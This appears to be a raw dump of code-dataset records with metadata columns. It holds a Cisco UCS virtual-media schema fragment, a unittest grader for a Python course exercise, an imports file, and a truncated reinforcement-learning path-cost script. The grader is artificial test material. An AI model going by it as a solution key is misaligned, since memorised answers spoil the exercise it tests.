"admin_action": MoPropertyMeta("admin_action", "adminAction", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x2, 0, 510, None, ["delete-volume", "remap-volume"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version301c, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"drive_type": MoPropertyMeta("drive_type", "driveType", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, ["cd", "floppy"], []),
"map": MoPropertyMeta("map", "map", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, ["cifs", "nfs", "www"], []),
"mount_options": MoPropertyMeta("mount_options", "mountOptions", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, 1, 248, None, [], []),
"password": MoPropertyMeta("password", "password", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"remote_file": MoPropertyMeta("remote_file", "remoteFile", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{1,235}""", [], []),
"remote_share": MoPropertyMeta("remote_share", "remoteShare", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{1,235}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"username": MoPropertyMeta("username", "username", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"volume_name": MoPropertyMeta("volume_name", "volumeName", "string", VersionMeta.Version301c, MoPropertyMeta.NAMING, 0x20, None, None, r"""[\-\.:_a-zA-Z0-9]{1,47}""", [], []),
},
"modular": {
"admin_action": MoPropertyMeta("admin_action", "adminAction", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x2, 0, 510, None, ["delete-volume", "remap-volume"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version301c, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"drive_type": MoPropertyMeta("drive_type", "driveType", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, ["cd", "floppy"], []),
"map": MoPropertyMeta("map", "map", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, ["cifs", "nfs", "www"], []),
"mount_options": MoPropertyMeta("mount_options", "mountOptions", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, 1, 248, None, [], []),
"password": MoPropertyMeta("password", "password", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"remote_file": MoPropertyMeta("remote_file", "remoteFile", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{1,235}""", [], []),
"remote_share": MoPropertyMeta("remote_share", "remoteShare", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{1,235}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version301c, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"username": MoPropertyMeta("username", "username", "string", VersionMeta.Version301c, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"volume_name": MoPropertyMeta("volume_name", "volumeName", "string", VersionMeta.Version301c, MoPropertyMeta.NAMING, 0x20, None, None, r"""[\-\.:_a-zA-Z0-9]{1,47}""", [], []),
},
}
prop_map = {
"classic": {
"adminAction": "admin_action",
"childAction": "child_action",
"dn": "dn",
"driveType": "drive_type",
"map": "map",
"mountOptions": "mount_options",
"password": "password",
"remoteFile": "remote_file",
"remoteShare": "remote_share",
"rn": "rn",
"status": "status",
"username": "username",
"volumeName": "volume_name",
},
"modular": {
"adminAction": "admin_action",
"childAction": "child_action",
"dn": "dn",
"driveType": "drive_type",
"map": "map",
"mountOptions": "mount_options",
"password": "password",
"remoteFile": "remote_file",
"remoteShare": "remote_share",
"rn": "rn",
"status": "status",
"username": "username",
"volumeName": "volume_name",
},
}
def __init__(self, parent_mo_or_dn, volume_name, **kwargs):
self._dirty_mask = 0
self.volume_name = volume_name
self.admin_action = None
self.child_action = None
self.drive_type = None
self.map = None
self.mount_options = None
self.password = None
self.remote_file = None
self.remote_share = None
self.status = None
self.username = None
ManagedObject.__init__(self, "CommSavedVMediaMap", parent_mo_or_dn, **kwargs)
| 62.627119
| 228
| 0.60406
| 699
| 7,390
| 6.223176
| 0.151645
| 0.08092
| 0.167356
| 0.251034
| 0.812414
| 0.812414
| 0.812414
| 0.812414
| 0.812414
| 0.812414
| 0
| 0.030334
| 0.201489
| 7,390
| 117
| 229
| 63.162393
| 0.706829
| 0.015697
| 0
| 0.583333
| 0
| 0
| 0.271964
| 0.042413
| 0
| 0
| 0.005784
| 0
| 0
| 1
| 0.010417
| false
| 0.052083
| 0.03125
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
f7ddc3dba348063a9525289f18d2ba16a3439900
| 12,531
|
py
|
Python
|
advanced/part12-11_attempted_courses/test/test_attempted_courses.py
|
Hannah-Abi/python-pro-21
|
2ce32c4bf118054329d19afdf83c50561be1ada8
|
[
"MIT"
] | null | null | null |
advanced/part12-11_attempted_courses/test/test_attempted_courses.py
|
Hannah-Abi/python-pro-21
|
2ce32c4bf118054329d19afdf83c50561be1ada8
|
[
"MIT"
] | null | null | null |
advanced/part12-11_attempted_courses/test/test_attempted_courses.py
|
Hannah-Abi/python-pro-21
|
2ce32c4bf118054329d19afdf83c50561be1ada8
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import patch
from tmc import points, reflect
from tmc.utils import load, load_module, reload_module, get_stdout, check_source, sanitize
from functools import reduce
import os
import os.path
import textwrap
from random import choice, randint
from datetime import date, datetime, timedelta
exercise = 'src.attempted_courses'
def f(attr: list):
return ",".join(attr)
def s(response):
output = ""
for n in response:
output += n + "\n"
return output
class AttemptedCoursesTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
with patch('builtins.input', side_effect=[AssertionError("Input was not expected")]):
cls.module = load_module(exercise, 'fi')
def test_0a_main_ok(self):
ok, line = check_source(self.module)
message = """Code testing the functions must be located after the
if __name__ == "__main__":
block. The following line must be moved:
"""
self.assertTrue(ok, message+line)
@points('12.attempted_courses_part1')
def test_01_function_names_of_students_exists(self):
try:
from src.attempted_courses import names_of_students
except:
self.fail("Your program should have a function called names_of_students(attempts: list)")
@points('12.attempted_courses_part1')
def test_02_course_names_return_type(self):
from src.attempted_courses import names_of_students
from src.attempted_courses import CourseAttempt
code = """
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
course_names([s1, s2, s3])
"""
try:
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
response = names_of_students([s1, s2, s3])
except:
self.fail(f"Check that the following code can be executed\n{code}")
m = map(None, [])
taip = str(type(response)).replace("<class '","").replace("'>","")
self.assertTrue(type(response) == type(m) or type(response) == list, f"Function names_of_students(students: list) should return map or list, now the return value was of type {taip}")
for alkio in response:
etaip = str(type("")).replace("<class '","").replace("'>","")
taip = str(type(alkio)).replace("<class '","").replace("'>","")
self.assertTrue(type(alkio) == type(""), f"When this code is executed {code}the values returned should be of type {etaip} now the type is {taip}")
@points('12.attempted_courses_part1')
def test_03_names_of_students_works_1(self):
from src.attempted_courses import names_of_students
from src.attempted_courses import CourseAttempt
code = """
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
course_names([s1, s2, s3])
"""
try:
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
response = names_of_students([s1, s2, s3])
except:
self.fail(f"Check that the following code can be executed\n{code}")
exp = [ s.student_name for s in [s1, s2, s3]]
output = ""
vast = []
for n in response:
output += n + "\n"
vast.append(n)
self.assertEquals(sorted(vast), sorted(exp), f"When this code is executed {code}it should retunrn \n{s(exp)}\nnow the function returns\n{output}")
@points('12.attempted_courses_part1')
def test_04_names_of_students_map_used(self):
src_file = os.path.join('src', 'attempted_courses.py')
lines = []
p = False
with open(src_file) as f:
for line in f:
if "def names_of_students" in line:
p = True
elif p and ('__name__ == "__main__":' in line or "def names_of_students" in line):
p = False
elif p:
lines.append(line)
on = False
for line in lines:
if "map" in line:
on = True
self.assertTrue(on, f"Function names_of_students(attempts: list) must use map!")
@points('12.attempted_courses_part1')
def test_05_names_of_students_works_2(self):
from src.attempted_courses import names_of_students
from src.attempted_courses import CourseAttempt
code = """
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
s4 = CourseAttempt("Hector Helastic", "Introduction to Programming", 3)
s5 = CourseAttempt("Lady Gaga", "Introduction to Programming", 5)
s6 = CourseAttempt("Eila Karkki", "Advanced Programming", 2)
course_names([s1, s2, s3, s4, s5, s6])
"""
try:
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
s4 = CourseAttempt("Hector Helastic", "Introduction to Programming", 3)
s5 = CourseAttempt("Lady Gaga", "Introduction to Programming", 5)
s6 = CourseAttempt("Eila Karkki", "Advanced Programming", 2)
response = names_of_students([s1, s2, s3, s4, s5, s6])
except:
self.fail(f"Check that the following code can be executed\n{code}")
exp = [ s.student_name for s in [s1, s2, s3, s4, s5, s6]]
output = ""
vast = []
for n in response:
output += n + "\n"
vast.append(n)
self.assertEquals(sorted(vast), sorted(exp), f"When this code is executed {code}it should retunrn \n{s(exp)}\nnow the function returns\n{output}")
@points('12.attempted_courses_part2')
def test_06_function_course_names_exists(self):
try:
from src.attempted_courses import course_names
except:
self.fail("Your program should have a function called course_names(attempts: list)")
@points('12.attempted_courses_part2')
def test_07_course_names_return_type(self):
from src.attempted_courses import course_names
from src.attempted_courses import CourseAttempt
code = """
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
course_names([s1, s2, s3])
"""
try:
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
response = course_names([s1, s2, s3])
except:
self.fail(f"Check that the following code can be executed\n{code}")
m = map(None, [])
taip = str(type(response)).replace("<class '","").replace("'>","")
self.assertTrue(type(response) == type(m) or type(response) == list or type(response) == set, f"Function course_names(course_namet: list) should return map or list, now the return value was of type {taip}")
for alkio in response:
etaip = str(type("")).replace("<class '","").replace("'>","")
taip = str(type(alkio)).replace("<class '","").replace("'>","")
self.assertTrue(type(alkio) == type(""), f"When this code is executed {code}the values returned should be of type {etaip} now the type is {taip}")
@points('12.attempted_courses_part2')
def test_08_course_names_works_1(self):
from src.attempted_courses import course_names
from src.attempted_courses import CourseAttempt
code = """
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
course_names([s1, s2, s3])
"""
try:
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Advanced Programming", 2)
response = course_names([s1, s2, s3])
except:
self.fail(f"Check that the following code can be executed\n{code}")
m = map(None, [])
taip = str(type(response)).replace("<class '","").replace("'>","")
self.assertTrue(type(response) == type(m) or type(response) == list or type(response) == set, f"Function course_names(course_namet: list) should return map or list, now the return value was of type {taip}")
response = list(response)
for alkio in response:
etaip = str(type("")).replace("<class '","").replace("'>","")
taip = str(type(alkio)).replace("<class '","").replace("'>","")
self.assertTrue(type(alkio) == type(""), f"When this code is executed {code}the values returned should be of type {etaip} now the type is {taip}")
exp = sorted(set( s.course_name for s in [s1, s2, s3]))
output = ""
vast = []
for n in response:
output += n + "\n"
vast.append(n)
self.assertTrue(sorted(vast) == sorted(exp), f"When this code is executed {code}should return course names \n{s(exp)}\nnow the function returns\n{output}")
@points('12.attempted_courses_part2')
def test_09_course_names_uses_map(self):
src_file = os.path.join('src', 'attempted_courses.py')
lines = []
p = False
with open(src_file) as f:
for line in f:
if "def course_names" in line:
p = True
elif p and ('__name__ == "__main__":' in line or "def course_names" in line):
p = False
elif p:
lines.append(line)
on = False
for line in lines:
if "map" in line:
on = True
self.assertTrue(on, f"Function course_names(attempts: list) must use map!")
@points('12.attempted_courses_part2')
def test_10_course_names_works_2(self):
from src.attempted_courses import course_names
from src.attempted_courses import CourseAttempt
code = """
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Algorithms", 2)
s4 = CourseAttempt("Hector Helastic", "Full stack", 3)
s5 = CourseAttempt("Lady Gaga", "Advanced Programming", 5)
s6 = CourseAttempt("Eila Karkki", "Data Communications 1", 2)
course_names([s1, s2, s3, s4, s5, s6])
"""
try:
s1 = CourseAttempt("Peter Python", "Introduction to Programming", 3)
s2 = CourseAttempt("Paula Programmer", "Introduction to Programming", 5)
s3 = CourseAttempt("Peter Python", "Algorithms", 2)
s4 = CourseAttempt("Hector Helastic", "Full stack", 3)
s5 = CourseAttempt("Lady Gaga", "Advanced Programming", 5)
s6 = CourseAttempt("Eila Karkki", "Data Communications 1", 2)
response = course_names([s1, s2, s3, s4, s5, s6])
except:
self.fail(f"Check that the following code can be executed\n{code}")
exp = sorted(set( s.course_name for s in [s1, s2, s3, s4, s5, s6]))
output = ""
vast = []
for n in response:
output += n + "\n"
vast.append(n)
self.assertEquals(sorted(vast), sorted(exp), f"When this code is executed {code}it should return courses\n{s(exp)}\nnow the function returns\n{output}")
if __name__ == '__main__':
unittest.main()
| 41.77
| 214
| 0.624611
| 1,549
| 12,531
| 4.93286
| 0.120723
| 0.051302
| 0.091611
| 0.042141
| 0.875802
| 0.868734
| 0.862714
| 0.831436
| 0.813899
| 0.797409
| 0
| 0.023362
| 0.251935
| 12,531
| 299
| 215
| 41.909699
| 0.791764
| 0
| 0
| 0.770492
| 0
| 0.040984
| 0.397095
| 0.041657
| 0
| 0
| 0
| 0
| 0.057377
| 1
| 0.057377
| false
| 0
| 0.098361
| 0.004098
| 0.168033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
792ba341df25f49690b1611eccd3ddee9ba01581
| 76
|
py
|
Python
|
src/vps/netvlad/ccsmmutils/__init__.py
|
deepguider/RoadGPS
|
7db4669a54da98a854886b89b6922fb8c7a60f33
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 2
|
2019-05-22T12:47:34.000Z
|
2019-05-23T15:43:47.000Z
|
src/vps/netvlad/ccsmmutils/__init__.py
|
deepguider/RoadGPS
|
7db4669a54da98a854886b89b6922fb8c7a60f33
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/vps/netvlad/ccsmmutils/__init__.py
|
deepguider/RoadGPS
|
7db4669a54da98a854886b89b6922fb8c7a60f33
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2019-08-09T06:50:46.000Z
|
2019-08-09T06:50:46.000Z
|
from .img_utils import concat_images
from .img_utils import concat_n_images
| 25.333333
| 38
| 0.868421
| 13
| 76
| 4.692308
| 0.538462
| 0.229508
| 0.393443
| 0.590164
| 0.786885
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 76
| 2
| 39
| 38
| 0.897059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f71bfd5b0f2615891de5ac70368d3a37c96767b7
| 17,386
|
py
|
Python
|
HER_mod/rl_modules/get_path_costs.py
|
schrammlb2/policy-guided-sst
|
8dce6619b9c771c39915c60fe9c54270ea1e621e
|
[
"Apache-2.0"
] | null | null | null |
HER_mod/rl_modules/get_path_costs.py
|
schrammlb2/policy-guided-sst
|
8dce6619b9c771c39915c60fe9c54270ea1e621e
|
[
"Apache-2.0"
] | null | null | null |
HER_mod/rl_modules/get_path_costs.py
|
schrammlb2/policy-guided-sst
|
8dce6619b9c771c39915c60fe9c54270ea1e621e
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import pickle
import os
from scipy import stats
from HER_mod.rl_modules.tsp import generate_path
from HER_mod.rl_modules.hyperparams import NUM_GOALS, NUM_AGENTS
gd_step_list = [0,2,5, 10, 20, 40]
# NUM_AGENTS = 3
N=200
def get_path_costs(train_pos_agent, train_vel_agent, perm_search=True):
pos_run_time_list = []
vel_run_time_list = []
# gd_step_list = [0,5,10]
num_agents = NUM_AGENTS
num_goals=NUM_GOALS
n=N
# gd_step_list = [0,1]
# num_agents = 2
# num_goals=2
# n=2
pos_time_list = []
vel_time_list = []
for _ in range(num_agents):
pos_agent = train_pos_agent()
vel_agent = train_vel_agent()
pos_agent_time_list = []
vel_agent_time_list = []
for i in range(n):
# goals = [np.random.rand(2)*2-1 for i in range(num_goals)]
# pos = np.random.rand(2)*2-1
goals = generate_path(num_goals + 1)
pos = goals[0]
goals = goals[1:-1]
# pos_agent_time_list = []
min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = pos_agent.find_shortest_path(pos, goals, gd_steps=0, perm_search=perm_search)
pos_test_time_list = [len(min_trajectory)]*len(gd_step_list)
pos_agent_time_list.append(pos_test_time_list)
vel_test_time_list = []
for gd_steps in gd_step_list:
min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = vel_agent.find_shortest_path(pos, goals, gd_steps=gd_steps, perm_search=perm_search)
vel_test_time_list.append(len(min_trajectory))
vel_agent_time_list.append(vel_test_time_list)
pos_time_list.append(pos_agent_time_list)
vel_time_list.append(vel_agent_time_list)
vel_time_list = np.array(vel_time_list).squeeze()
pos_time_list = np.array(pos_time_list).squeeze()
relative_time_change = (vel_time_list-pos_time_list)/pos_time_list
relative_time_change = np.mean(relative_time_change, axis=1)
try:
pickle.dump(vel_time_list, open("velocity_target.pkl", 'wb'))
pickle.dump(pos_time_list, open("no_velocity_target.pkl", 'wb'))
pickle.dump(relative_time_change, open("relative_time_change.pkl", 'wb'))
except:
print("pickle failure")
import pdb
pdb.set_trace()
mean = relative_time_change.mean(axis=0)
t_score = stats.t.ppf(.975, num_agents)
ci = t_score*relative_time_change.std(axis=0)/(num_agents**.5)
steps = np.array(gd_step_list)
plt.plot(steps, mean)
plt.fill_between(steps, mean+ci, mean-ci, alpha=.4)
plt.xlabel("Gradient steps")
plt.ylabel("Relative Improvement vs standard HER")
plt.title("Relative Improvement")
plt.savefig(os.path.join('results', "Relative Improvement" + '.png'))
plt.close()
# import pdb
# pdb.set_trace()
# def method_comparison(train_pos_agent, train_vel_agent):
# # method_list = ['random search', "gradient descent", "gradient descent (40 steps)", "random", "0 velocity target"]
# method_list = ['random search', "gradient descent", "random", "0 velocity target"]
# method_runtime_dict = {'greedy': []}
# for method in method_list:
# method_runtime_dict[method] = []
# num_agents = NUM_AGENTS
# num_goals=NUM_GOALS
# n=N
# pos_time_list = []
# vel_time_list = []
# for _ in range(num_agents):
# pos_agent = train_pos_agent()
# vel_agent = train_vel_agent()
# for method in method_runtime_dict.keys():
# method_runtime_dict[method].append([])
# for i in range(n):
# # goals = [np.random.rand(2)*2-1 for i in range(num_goals)]
# # pos = np.random.rand(2)*2-1
# goals = generate_path(num_goals + 1)
# pos = goals[0]
# goals = goals[1:-1]
# # pos_agent_time_list = []
# min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = pos_agent.select_path(pos, goals, method="0 velocity target")
# # pos_test_time_list = [len(min_trajectory)]*len(gd_step_list)
# method_runtime_dict['greedy'][-1].append(len(min_trajectory))
# # vel_test_time_list = []
# for method in method_list:
# min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = vel_agent.select_path(pos, goals, method=method)
# method_runtime_dict[method][-1].append(len(min_trajectory))
# # vel_agent_time_list.append(vel_test_time_list)
# greedy = method_runtime_dict['greedy']
# method_runtime_dict = {method: np.array(method_runtime_dict[method]) for method in method_runtime_dict.keys()}
# performance_dict = {method: (method_runtime_dict[method].mean(), 2*(method_runtime_dict[method].mean(axis=-1)).std()/(num_agents**.5)) for method in method_runtime_dict.keys()}
# relative_time_dict = {method: (method_runtime_dict[method] - greedy)/greedy for method in method_list}
# improvement_dict = {method: (relative_time_dict[method].mean(), 2*(relative_time_dict[method].mean(axis=-1)).std()/(num_agents**.5)) for method in method_list}
# performance_list = [performance_dict[m][0] for m in method_runtime_dict.keys()]
# performance_ci_list = [performance_dict[m][1] for m in method_runtime_dict.keys()]
# relative_time_list = [improvement_dict[m][0] for m in method_list]
# relative_time_ci_list = [improvement_dict[m][1] for m in method_list]
# plt.xticks(range(len(method_runtime_dict.keys())), list(method_runtime_dict.keys()))
# plt.xlabel("Method")
# plt.ylabel('Time to complete')
# plt.title('Comparison of velocity target-setting methods')
# plt.bar(range(len(performance_list)), performance_list, yerr=performance_ci_list)
# plt.savefig(os.path.join('results', "Method comparison -- Performance" + '.png'))
# plt.close()
# plt.xticks(range(len(method_list)), method_list)
# plt.xlabel("Method")
# plt.ylabel('Cost reduction over greedy baseline')
# plt.title('Comparison of velocity target-setting methods')
# plt.bar(range(len(relative_time_list)), relative_time_list, yerr=relative_time_ci_list)
# plt.savefig(os.path.join('results', "Method comparison -- Relative Improvement" + '.png'))
# plt.close()
def method_comparison(train_pos_agent, train_vel_agent):
method_list = ['random search', "gradient descent", "gradient descent (40 steps)", "random", "0 velocity target"]
# method_list = ['random search', "gradient descent", "random", "0 velocity target"]
method_runtime_dict = {'greedy': []}
for method in method_list:
method_runtime_dict[method] = []
num_agents = NUM_AGENTS
num_goals=NUM_GOALS
n=N
pos_time_list = []
vel_time_list = []
failed_counter_dict = {'greedy': 0}
for method in method_list:
failed_counter_dict[method] = 0
for _ in range(num_agents):
pos_agent = train_pos_agent()
vel_agent = train_vel_agent()
for method in method_runtime_dict.keys():
method_runtime_dict[method].append([])
for i in range(n):
# goals = [np.random.rand(2)*2-1 for i in range(num_goals)]
# pos = np.random.rand(2)*2-1
goals = generate_path(num_goals + 1)
pos = goals[0]
goals = goals[1:-1]
# pos_agent_time_list = []
min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = pos_agent.select_path(pos, goals, method="0 velocity target")
# pos_test_time_list = [len(min_trajectory)]*len(gd_step_list)
if successful:
method_runtime_dict['greedy'][-1].append(len(min_trajectory))
else:
method_runtime_dict['greedy'][-1].append("NULL")
failed_counter_dict['greedy'] += 1
# vel_test_time_list = []
for method in method_list:
min_time, min_trajectory, min_path, min_vel_path, successful, pass_vals = vel_agent.select_path(pos, goals, method=method)
if successful:
method_runtime_dict[method][-1].append(len(min_trajectory))
else:
method_runtime_dict[method][-1].append("NULL")
failed_counter_dict[method] += 1
# vel_agent_time_list.append(vel_test_time_list)
success_rates = {method: 1-failed_counter_dict[method]/(num_agents*n) for method in failed_counter_dict.keys()}
greedy = method_runtime_dict['greedy']
agent_performance_dict = {}
mean_performance_dict = {}
ci_performance_dict = {}
improvement_dict = {}
mean_improvement_dict = {}
ci_improvement_dict = {}
t_score = stats.t.ppf(.975, num_agents)
for method in method_runtime_dict.keys():
agent_performance_dict[method] = [[time for time in agent_list if time != "NULL"] for agent_list in method_runtime_dict[method]]
agent_performance_dict[method] = [sum(agent_list)/len(agent_list) for agent_list in agent_performance_dict[method]]
mean = sum(agent_performance_dict[method])/len(agent_performance_dict[method])
mean_performance_dict[method] = mean
ci_performance_dict[method] = t_score*sum([(v-mean)**2 for v in agent_performance_dict[method]])**.5/len(agent_performance_dict[method])
improvement_list = []
mean_list = []
for agent_ind in range(num_agents):
agent_list = method_runtime_dict[method][agent_ind]
greedy_list = greedy[agent_ind]
improvement_list.append([(agent_list[i] - greedy_list[i])/greedy_list[i] for i in range(n) if (agent_list[i] != "NULL" and greedy_list[i]!= "NULL")])
mean_list.append(sum(improvement_list[agent_ind])/len(improvement_list[agent_ind]))
mean = sum(mean_list)/len(mean_list)
mean_improvement_dict[method] = mean
ci_improvement_dict[method] = t_score*sum([(v-mean)**2 for v in mean_list])**.5/len(mean_list)
# agent_improvement_dict[method] = [[(time - greedy_time)/greedy_time for time in agent_list if time != "NULL"] for agent_list in method_runtime_dict[method]]
# agent_performance_dict[method] = [sum(agent_list)/len(agent_list) for agent_list in agent_performance_dict[method]]
# mean_performance_dict[method] = sum(agent_performance_dict[method])/len(agent_performance_dict[method])
# ci_performance_dict[method] = 2*sum([(v-mean)**2 for v in agent_performance_dict[method]])**.5/len(agent_performance_dict[method])
# method_runtime_dict = {method: np.array(method_runtime_dict[method]) for method in method_runtime_dict.keys()}
# mean_performance_dict = {method: method_runtime_dict[method] for method in method_runtime_dict.keys()}
# relative_time_dict = {method: (method_runtime_dict[method] - greedy)/greedy for method in method_list}
# improvement_dict = {method: (relative_time_dict[method].mean(), 2*(relative_time_dict[method].mean(axis=-1)).std()/(num_agents**.5)) for method in method_list}
# greedy = method_runtime_dict['greedy']
# method_runtime_dict = {method: np.array(method_runtime_dict[method]) for method in method_runtime_dict.keys()}
# performance_dict = {method: (method_runtime_dict[method].mean(), 2*(method_runtime_dict[method].mean(axis=-1)).std()/(num_agents**.5)) for method in method_runtime_dict.keys()}
# relative_time_dict = {method: (method_runtime_dict[method] - greedy)/greedy for method in method_list}
# improvement_dict = {method: (relative_time_dict[method].mean(), 2*(relative_time_dict[method].mean(axis=-1)).std()/(num_agents**.5)) for method in method_list}
performance_list = [mean_performance_dict[m] for m in method_runtime_dict.keys()]
performance_ci_list = [ci_performance_dict[m] for m in method_runtime_dict.keys()]
relative_time_list = [mean_improvement_dict[m] for m in method_list]
relative_time_ci_list = [ci_improvement_dict[m] for m in method_list]
sr_list = [success_rates[m] for m in method_runtime_dict.keys()]#method_list]
# plt.xticks(range(len(method_list)), method_list)
plt.xticks(range(len(method_runtime_dict.keys())), list(method_runtime_dict.keys()))
plt.xlabel("Method")
plt.ylabel('Success rate')
plt.title('Comparison of velocity target-setting methods')
plt.bar(range(len(sr_list)), sr_list)
plt.savefig(os.path.join('results', "Method comparison -- Success Rate" + '.png'))
plt.close()
plt.xticks(range(len(method_runtime_dict.keys())), list(method_runtime_dict.keys()))
plt.xlabel("Method")
plt.ylabel('Time to complete')
plt.title('Comparison of velocity target-setting methods')
plt.bar(range(len(performance_list)), performance_list, yerr=performance_ci_list)
plt.savefig(os.path.join('results', "Method comparison -- Performance" + '.png'))
plt.close()
plt.xticks(range(len(method_list)), method_list)
plt.xlabel("Method")
plt.ylabel('Cost reduction over greedy baseline')
plt.title('Comparison of velocity target-setting methods')
plt.bar(range(len(relative_time_list)), relative_time_list, yerr=relative_time_ci_list)
plt.savefig(os.path.join('results', "Method comparison -- Relative Improvement" + '.png'))
plt.close()
def get_random_search_costs(train_vel_agent, perm_search=True):
pos_run_time_list = []
vel_run_time_list = []
# gd_step_list = [0,5,10]
num_agents = NUM_AGENTS
num_goals=NUM_GOALS
n=N
# gd_step_list = [0,1]
# num_agents = 2
# num_goals=2
# n=2
rand_time_list = []
gd_time_list = []
